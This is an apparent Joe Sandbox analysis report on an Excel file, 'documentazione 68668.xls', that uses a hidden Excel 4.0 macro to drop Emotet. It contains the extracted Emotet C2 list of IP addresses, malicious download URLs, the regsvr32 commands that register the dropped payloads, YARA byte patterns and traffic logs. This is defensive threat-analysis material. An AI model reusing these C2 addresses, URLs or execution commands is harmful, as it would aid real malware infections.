Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
documentazione 68668.xls

Overview

General Information

Sample Name:documentazione 68668.xls
Analysis ID:679676
MD5:a4c856aa217eab1f66dfade13f701013
SHA1:c4bd8e7e5cbb3e8038186851e7eb9ee65007c64d
SHA256:51737c16eed7b848b37b843555c7bda5ead1f418fbadb8def452d287d0817179
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
PE file contains more sections than normal
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2996 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1952 cmdline: C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1472 cmdline: C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1200 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1980 cmdline: C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • svchost.exe (PID: 2104 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["165.22.254.68:443", "198.199.70.22:8080", "104.244.79.94:443", "103.224.241.74:8080", "88.217.172.165:8080", "118.98.72.86:443", "104.248.225.227:8080", "196.44.98.190:8080", "103.254.12.236:7080", "157.245.111.0:8080", "68.183.91.111:8080", "202.29.239.162:443", "37.44.244.177:8080", "139.196.72.155:8080", "64.227.55.231:8080", "103.85.95.4:8080", "195.77.239.39:8080", "202.134.4.210:7080", "54.37.106.167:8080", "103.41.204.169:8080", "85.25.120.45:8080", "59.148.253.194:443", "175.126.176.79:8080", "103.126.216.86:443", "93.104.209.107:8080", "103.56.149.105:8080", "202.28.34.99:8080", "103.71.99.57:8080", "62.171.178.147:8080", "116.124.128.206:8080", "54.37.228.122:443", "210.57.209.142:8080", "128.199.217.206:443", "36.67.23.59:443", "188.225.32.231:4143", "87.106.97.83:7080", "85.214.67.203:8080", "78.47.204.80:443", "178.62.112.199:8080", "165.232.185.110:8080", "157.230.99.206:8080", "165.22.254.236:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0hvkZWKoAAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWi/kZWKoAAIg="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
documentazione 68668.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x96aa:$s1: Excel
  • 0xa759:$s1: Excel
  • 0x35d4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\documentazione 68668.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x96aa:$s1: Excel
  • 0xa759:$s1: Excel
  • 0x35d4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Joe Security
    00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Emotet_db7d33faunknownunknown
      • 0x45f2:$chunk_0: 4C 8D 9C 24 E0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
      • 0x6e7e:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
      • 0x18988:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
      • 0x1c8b3:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
      • 0x388c:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3
      • 0x6e6c:$chunk_3: 48 8B 45 47 BB 01 00 00 00 48 89 07 8B 45 4F 89 47 08 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
      • 0xdf70:$chunk_4: 48 39 3B 4C 8D 9C 24 C0 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3
      • 0x15a57:$chunk_5: BE 02 00 00 00 4C 8D 9C 24 50 02 00 00 8B C6 49 8B 5B 30 49 8B 73 38 49 8B 7B 40 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3
      • 0x556e:$chunk_7: 88 02 48 FF C2 48 FF C3 8A 03 84 C0 75 EE EB 03
      00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Emotet_d6ac1ea4unknownunknown
      • 0x797:$calc1: C7 44 24 30 1D 07 A6 34 C7 04 24 06 12 02 3A C7 44 24 28 5D E4 91 D3 C7 44 24 38 07 12 92 25 C7 44 24 20 53 17 FC 00
      • 0x87e:$calc1: C7 44 24 40 89 6D C3 12 C7 04 24 48 2E 39 69 C7 44 24 38 14 8B A0 DC C7 44 24 48 49 2E A9 76 C7 44 24 30 2B D2 E2 00
      • 0xcaa:$calc1: C7 44 24 40 11 60 F3 10 C7 04 24 91 90 D3 68 C7 44 24 38 D7 A7 B5 06 C7 44 24 48 90 90 43 77 C7 44 24 30 C3 57 9F 00
      • 0x1f02:$calc1: C7 44 24 40 FD 85 F1 55 C7 04 24 1B DF 1A 17 C7 44 24 38 FD 85 F1 55 C7 44 24 48 1B DF 1A 17 C7 44 24 30 D5 51 D7 00
      • 0x200e:$calc1: C7 44 24 40 41 D9 4A 25 C7 04 24 C1 EB 0D 4B C7 44 24 38 14 0F 09 EE C7 44 24 48 C0 EB 9D 54 C7 44 24 30 E8 CD 51 00
      • 0x23d4:$calc1: C7 44 24 30 E0 65 3F 6C C7 04 24 90 5D 98 34 C7 44 24 28 24 49 5D D2 C7 44 24 38 91 5D 08 2B C7 44 24 20 B9 10 85 00
      • 0x24c7:$calc1: C7 44 24 40 31 2C 69 41 C7 04 24 B2 9C 81 58 C7 44 24 38 52 1A B7 F9 C7 44 24 48 B2 9C CC 6A C7 44 24 30 AC E9 53 00
      • 0x268a:$calc1: C7 44 24 30 A5 65 D3 30 C7 04 24 E4 2A 46 2D C7 44 24 28 93 40 B9 97 C7 44 24 38 E5 2A D6 32 C7 44 24 20 D5 F9 78 00
      • 0x2d2b:$calc1: C7 44 24 30 F4 2B A5 2A C7 04 24 99 13 C2 43 C7 44 24 28 B9 5B BA 58 C7 44 24 38 99 13 DB C0 C7 44 24 20 1E 07 A2 00
      • 0x2e28:$calc1: C7 44 24 40 2A 77 B1 57 C7 04 24 0B BE 77 27 C7 44 24 38 96 96 91 B0 C7 44 24 48 0A BE 58 37 C7 44 24 30 24 8B E2 00
      • 0x32dc:$calc1: C7 44 24 40 87 4A CE 17 C7 04 24 58 41 45 6D C7 44 24 38 B1 6F 2A 6D C7 44 24 48 59 41 FE 6C C7 44 24 30 78 19 FE 00
      • 0x33c3:$calc1: C7 44 24 30 15 E5 14 3B C7 04 24 F9 FD 0C 74 C7 44 24 28 C7 DC C5 B5 C7 44 24 38 F8 FD 9C 6B C7 44 24 20 38 65 3F 00
      • 0x37d6:$calc1: C7 44 24 40 0D 38 EB 1E C7 04 24 CC 96 87 7E C7 44 24 38 29 7B FC 25 C7 44 24 48 CD 96 3C 7F C7 44 24 30 8A 75 E7 00
      • 0x3900:$calc1: C7 44 24 40 B1 9C FB 19 C7 04 24 26 C0 2D 2B C7 44 24 38 7B 81 14 BB C7 44 24 48 27 C0 96 2A C7 44 24 30 33 94 A5 00
      • 0x3e20:$calc1: C7 44 24 40 3C 6B A8 43 C7 04 24 F4 F7 94 5C C7 44 24 38 72 44 64 13 C7 44 24 48 F5 F7 2F 5D C7 44 24 30 C3 47 2B 00
      • 0x4a52:$calc1: C7 44 24 30 18 8B 78 26 C7 04 24 6B 47 EA 29 C7 44 24 28 DB C6 97 01 C7 44 24 38 6A 47 7A 36 C7 44 24 20 EC 19 73 00
      • 0x4b3f:$calc1: C7 44 24 30 E4 BD 33 1B C7 04 24 C2 51 CE 6C C7 44 24 28 D7 AE C9 E5 C7 44 24 38 C2 51 F5 D2 C7 44 24 20 F8 D9 51 00
      • 0x529a:$calc1: C7 44 24 40 6C 80 D1 44 C7 04 24 6F 2B BE 78 C7 44 24 38 04 74 9E 1A C7 44 24 48 6E 2B 05 79 C7 44 24 30 FE 3B 50 00
      • 0x7d2b:$calc1: C7 44 24 40 96 C7 88 54 C7 04 24 4B B8 C7 39 C7 44 24 38 A3 B2 2D A8 C7 44 24 48 4B B8 A0 74 C7 44 24 30 2C 7E 51 00
      • 0x7f78:$calc1: C7 44 24 30 66 E9 6F 25 C7 04 24 95 EB 2F 17 C7 44 24 28 52 75 FD 3C C7 44 24 38 95 EB 7C A5 C7 44 24 20 41 0C 43 00
      • 0x8183:$calc1: C7 44 24 30 B4 8B 82 2F C7 04 24 19 03 F8 62 C7 44 24 28 FF 99 DE 99 C7 44 24 38 19 03 C4 14 C7 44 24 20 E3 58 3D 00
      00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        Click to see the 8 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.regsvr32.exe.140000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          6.2.regsvr32.exe.4b0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            7.2.regsvr32.exe.140000.0.unpackWindows_Trojan_Emotet_db7d33faunknownunknown
            • 0x3df2:$chunk_0: 4C 8D 9C 24 E0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x667e:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x18188:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x1c0b3:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x308c:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3
            • 0x666c:$chunk_3: 48 8B 45 47 BB 01 00 00 00 48 89 07 8B 45 4F 89 47 08 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0xd770:$chunk_4: 48 39 3B 4C 8D 9C 24 C0 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3
            • 0x15257:$chunk_5: BE 02 00 00 00 4C 8D 9C 24 50 02 00 00 8B C6 49 8B 5B 30 49 8B 73 38 49 8B 7B 40 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3
            • 0x4d6e:$chunk_7: 88 02 48 FF C2 48 FF C3 8A 03 84 C0 75 EE EB 03
            7.2.regsvr32.exe.140000.0.unpackWindows_Trojan_Emotet_d6ac1ea4unknownunknown
            • 0x4aa:$calc1: C7 44 24 40 11 60 F3 10 C7 04 24 91 90 D3 68 C7 44 24 38 D7 A7 B5 06 C7 44 24 48 90 90 43 77 C7 44 24 30 C3 57 9F 00
            • 0x1702:$calc1: C7 44 24 40 FD 85 F1 55 C7 04 24 1B DF 1A 17 C7 44 24 38 FD 85 F1 55 C7 44 24 48 1B DF 1A 17 C7 44 24 30 D5 51 D7 00
            • 0x180e:$calc1: C7 44 24 40 41 D9 4A 25 C7 04 24 C1 EB 0D 4B C7 44 24 38 14 0F 09 EE C7 44 24 48 C0 EB 9D 54 C7 44 24 30 E8 CD 51 00
            • 0x1bd4:$calc1: C7 44 24 30 E0 65 3F 6C C7 04 24 90 5D 98 34 C7 44 24 28 24 49 5D D2 C7 44 24 38 91 5D 08 2B C7 44 24 20 B9 10 85 00
            • 0x1cc7:$calc1: C7 44 24 40 31 2C 69 41 C7 04 24 B2 9C 81 58 C7 44 24 38 52 1A B7 F9 C7 44 24 48 B2 9C CC 6A C7 44 24 30 AC E9 53 00
            • 0x1e8a:$calc1: C7 44 24 30 A5 65 D3 30 C7 04 24 E4 2A 46 2D C7 44 24 28 93 40 B9 97 C7 44 24 38 E5 2A D6 32 C7 44 24 20 D5 F9 78 00
            • 0x252b:$calc1: C7 44 24 30 F4 2B A5 2A C7 04 24 99 13 C2 43 C7 44 24 28 B9 5B BA 58 C7 44 24 38 99 13 DB C0 C7 44 24 20 1E 07 A2 00
            • 0x2628:$calc1: C7 44 24 40 2A 77 B1 57 C7 04 24 0B BE 77 27 C7 44 24 38 96 96 91 B0 C7 44 24 48 0A BE 58 37 C7 44 24 30 24 8B E2 00
            • 0x2adc:$calc1: C7 44 24 40 87 4A CE 17 C7 04 24 58 41 45 6D C7 44 24 38 B1 6F 2A 6D C7 44 24 48 59 41 FE 6C C7 44 24 30 78 19 FE 00
            • 0x2bc3:$calc1: C7 44 24 30 15 E5 14 3B C7 04 24 F9 FD 0C 74 C7 44 24 28 C7 DC C5 B5 C7 44 24 38 F8 FD 9C 6B C7 44 24 20 38 65 3F 00
            • 0x2fd6:$calc1: C7 44 24 40 0D 38 EB 1E C7 04 24 CC 96 87 7E C7 44 24 38 29 7B FC 25 C7 44 24 48 CD 96 3C 7F C7 44 24 30 8A 75 E7 00
            • 0x3100:$calc1: C7 44 24 40 B1 9C FB 19 C7 04 24 26 C0 2D 2B C7 44 24 38 7B 81 14 BB C7 44 24 48 27 C0 96 2A C7 44 24 30 33 94 A5 00
            • 0x3620:$calc1: C7 44 24 40 3C 6B A8 43 C7 04 24 F4 F7 94 5C C7 44 24 38 72 44 64 13 C7 44 24 48 F5 F7 2F 5D C7 44 24 30 C3 47 2B 00
            • 0x4252:$calc1: C7 44 24 30 18 8B 78 26 C7 04 24 6B 47 EA 29 C7 44 24 28 DB C6 97 01 C7 44 24 38 6A 47 7A 36 C7 44 24 20 EC 19 73 00
            • 0x433f:$calc1: C7 44 24 30 E4 BD 33 1B C7 04 24 C2 51 CE 6C C7 44 24 28 D7 AE C9 E5 C7 44 24 38 C2 51 F5 D2 C7 44 24 20 F8 D9 51 00
            • 0x4a9a:$calc1: C7 44 24 40 6C 80 D1 44 C7 04 24 6F 2B BE 78 C7 44 24 38 04 74 9E 1A C7 44 24 48 6E 2B 05 79 C7 44 24 30 FE 3B 50 00
            • 0x752b:$calc1: C7 44 24 40 96 C7 88 54 C7 04 24 4B B8 C7 39 C7 44 24 38 A3 B2 2D A8 C7 44 24 48 4B B8 A0 74 C7 44 24 30 2C 7E 51 00
            • 0x7778:$calc1: C7 44 24 30 66 E9 6F 25 C7 04 24 95 EB 2F 17 C7 44 24 28 52 75 FD 3C C7 44 24 38 95 EB 7C A5 C7 44 24 20 41 0C 43 00
            • 0x7983:$calc1: C7 44 24 30 B4 8B 82 2F C7 04 24 19 03 F8 62 C7 44 24 28 FF 99 DE 99 C7 44 24 38 19 03 C4 14 C7 44 24 20 E3 58 3D 00
            • 0x9c93:$calc1: C7 44 24 40 97 F5 40 3E C7 04 24 5D 9E 2D 26 C7 44 24 38 32 E3 BE 7A C7 44 24 48 5C 9E 96 27 C7 44 24 30 EB 06 66 00
            • 0xa6f6:$calc1: C7 44 24 30 B0 D1 CB 3E C7 04 24 66 1B C8 3C C7 44 24 28 3B 15 83 A5 C7 44 24 38 67 1B 58 23 C7 44 24 20 ED 7E 3C 00
            6.2.regsvr32.exe.4b0000.0.unpackWindows_Trojan_Emotet_db7d33faunknownunknown
            • 0x3df2:$chunk_0: 4C 8D 9C 24 E0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x667e:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x18188:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x1c0b3:$chunk_0: 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x308c:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3
            • 0x666c:$chunk_3: 48 8B 45 47 BB 01 00 00 00 48 89 07 8B 45 4F 89 47 08 4C 8D 9C 24 C0 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0xd770:$chunk_4: 48 39 3B 4C 8D 9C 24 C0 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3
            • 0x15257:$chunk_5: BE 02 00 00 00 4C 8D 9C 24 50 02 00 00 8B C6 49 8B 5B 30 49 8B 73 38 49 8B 7B 40 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3
            • 0x4d6e:$chunk_7: 88 02 48 FF C2 48 FF C3 8A 03 84 C0 75 EE EB 03
            Click to see the 7 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.22198.199.70.224917780802404322 08/06/22-09:20:53.106547
            SID:2404322
            Source Port:49177
            Destination Port:8080
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: documentazione 68668.xlsVirustotal: Detection: 55%Perma Link
            Source: documentazione 68668.xlsMetadefender: Detection: 37%Perma Link
            Source: documentazione 68668.xlsReversingLabs: Detection: 73%
            Antivirus / Scanner detection for submitted sample
            Source: documentazione 68668.xlsAvira: detected
            Antivirus detection for URL or domain
            Source: http://kronostr.com/tr/68yHRhfuU7Qj/Avira URL Cloud: Label: malware
            Source: https://www.zardamarine.com/images/psQbAjrrEOXWPrS/Avira URL Cloud: Label: malware
            Source: http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/Avira URL Cloud: Label: malware
            Source: https://198.199.70.22/BAvira URL Cloud: Label: malware
            Source: https://165.22.254.68/OAvira URL Cloud: Label: malware
            Source: https://198.199.70.22/080/FAvira URL Cloud: Label: malware
            Source: https://198.199.70.22:8080/eAvira URL Cloud: Label: malware
            Source: https://198.199.70.22:8080/aAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: zardamarine.comVirustotal: Detection: 10%Perma Link
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllAvira: detection malicious, Label: TR/Crypt.Agent.hwpwp
            Source: C:\Users\user\wdusx2.ocxAvira: detection malicious, Label: TR/Crypt.Agent.hwpwp
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllMetadefender: Detection: 40%Perma Link
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllReversingLabs: Detection: 88%
            Source: C:\Users\user\wdusx2.ocxMetadefender: Detection: 40%Perma Link
            Source: C:\Users\user\wdusx2.ocxReversingLabs: Detection: 88%
            Source: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)Metadefender: Detection: 40%Perma Link
            Source: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)ReversingLabs: Detection: 88%
            Source: 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["165.22.254.68:443", "198.199.70.22:8080", "104.244.79.94:443", "103.224.241.74:8080", "88.217.172.165:8080", "118.98.72.86:443", "104.248.225.227:8080", "196.44.98.190:8080", "103.254.12.236:7080", "157.245.111.0:8080", "68.183.91.111:8080", "202.29.239.162:443", "37.44.244.177:8080", "139.196.72.155:8080", "64.227.55.231:8080", "103.85.95.4:8080", "195.77.239.39:8080", "202.134.4.210:7080", "54.37.106.167:8080", "103.41.204.169:8080", "85.25.120.45:8080", "59.148.253.194:443", "175.126.176.79:8080", "103.126.216.86:443", "93.104.209.107:8080", "103.56.149.105:8080", "202.28.34.99:8080", "103.71.99.57:8080", "62.171.178.147:8080", "116.124.128.206:8080", "54.37.228.122:443", "210.57.209.142:8080", "128.199.217.206:443", "36.67.23.59:443", "188.225.32.231:4143", "87.106.97.83:7080", "85.214.67.203:8080", "78.47.204.80:443", "178.62.112.199:8080", "165.232.185.110:8080", "157.230.99.206:8080", "165.22.254.236:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0hvkZWKoAAJA=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWi/kZWKoAAIg="]}
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 208.67.23.91:443 -> 192.168.2.22:49171 version: TLS 1.2
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C3D8 FindNextFileW,FindFirstFileW,7_2_000000018000C3D8

            Software Vulnerabilities

            barindex
            Document exploit detected (drops PE files)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: UVvnppK[1].dll.0.drJump to dropped file
            Document exploit detected (creates forbidden files)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllJump to behavior
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
            Document exploit detected (UrlDownloadToFile)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
            Source: global trafficDNS query: name: www.zardamarine.com
            Source: global trafficDNS query: name: kronostr.com
            Source: global trafficDNS query: name: labfitouts.com
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
